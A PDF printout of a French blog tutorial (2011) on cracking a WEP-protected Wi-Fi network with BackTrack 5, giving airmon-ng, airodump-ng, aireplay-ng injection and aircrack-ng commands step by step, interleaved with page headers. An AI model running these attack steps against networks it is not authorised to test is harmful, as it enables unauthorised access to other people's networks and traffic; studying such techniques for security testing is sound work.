Академический Документы
Профессиональный Документы
Культура Документы
Backtrack 5 : Cracker un rseau Wifi proteg par cl WEP Blog de Valentin Pourchet
Sauter au contenu
Blog de Valentin Pourchet Blog consacr aux technologies de Virtualisation et d'administration systme VMware Microsoft Citrix Oracle Novell VirtualBox OCS / GLPI Administration Systme Scurit Stockage Matriel vLab Bibliographie Auteur Contact 2011/06/16 /
vpourchet.com/2011/06/16/backtrack-5-cracker-un-reseau-wifi-protege-par-cle-wep/
1/14
28/05/12
Backtrack 5 : Cracker un rseau Wifi proteg par cl WEP Blog de Valentin Pourchet
Nous passons maintenant notre adaptateur Wifi en mode monitor via la commande : # airmon-ng start wlan0
Le mode monitor est maintenant activ sur linterface mon0. Nous scannons maintenant les rseaux via la commande : # airodump-ng write <fichier de sauvegarde> <interface>
vpourchet.com/2011/06/16/backtrack-5-cracker-un-reseau-wifi-protege-par-cle-wep/
2/14
28/05/12
Backtrack 5 : Cracker un rseau Wifi proteg par cl WEP Blog de Valentin Pourchet
Certaines informations ont videmment ts masques En gros : la partie suprieure liste les AP ou Access points wifi, avec principalement leur adresse mac, le SSID, et la mthode de chiffrement. la partie infrieure liste les stations connectes aux AP. Dans cet article nous nous intressons AP dont le SSID est : H@cKinG_Cr0wD. Nous entrons donc la commande : # airodump_ng write <fichier de sortie> bssid <adresse mac du point dacces> <interface>
vpourchet.com/2011/06/16/backtrack-5-cracker-un-reseau-wifi-protege-par-cle-wep/
3/14
28/05/12
Backtrack 5 : Cracker un rseau Wifi proteg par cl WEP Blog de Valentin Pourchet
Le but est de collecter le plus de Datas (colonne #Data) possibles, or vous le constaterez surement, cela navance pas trs vite, do lutilit de la compatibilit du dongle avec linjection de paquets. Nous allons donc utiliser linjection pour booster un peu le trafic. On commence par tester une fausse authentification sur le rseau dans un nouveau terminal via la commande : # aireplay-ng -1 0 e <ESSID du rseau wifi> -a <adresse mac de lAP> -h <adresse mac de la station> <Interface>
Puis dans ce mme terminal nous entrons la commande dinjection de paquets : # aireplay-ng -3 -e <ESSID du rseau wifi> -b <adresse mac de lAP> -h <adresse mac de la station> <interface>
Une fois un nombre consquent atteint, et depuis un nouveau terminal, on lance la commande : # aircrack-ng x *.cap
vpourchet.com/2011/06/16/backtrack-5-cracker-un-reseau-wifi-protege-par-cle-wep/
4/14
28/05/12
Backtrack 5 : Cracker un rseau Wifi proteg par cl WEP Blog de Valentin Pourchet
Il faut collecter un certain nombre dIVS pour que lattaque russisse, patience donc.
Class dans Backtrack, Scurit Backtrack 5 : Tester la compatibilit dun adaptateur wifi avec linjection de paquets Backtrack 5 : Cracker un rseau Wifi protg par WPA 23 Commentaires
vpourchet.com/2011/06/16/backtrack-5-cracker-un-reseau-wifi-protege-par-cle-wep/ 5/14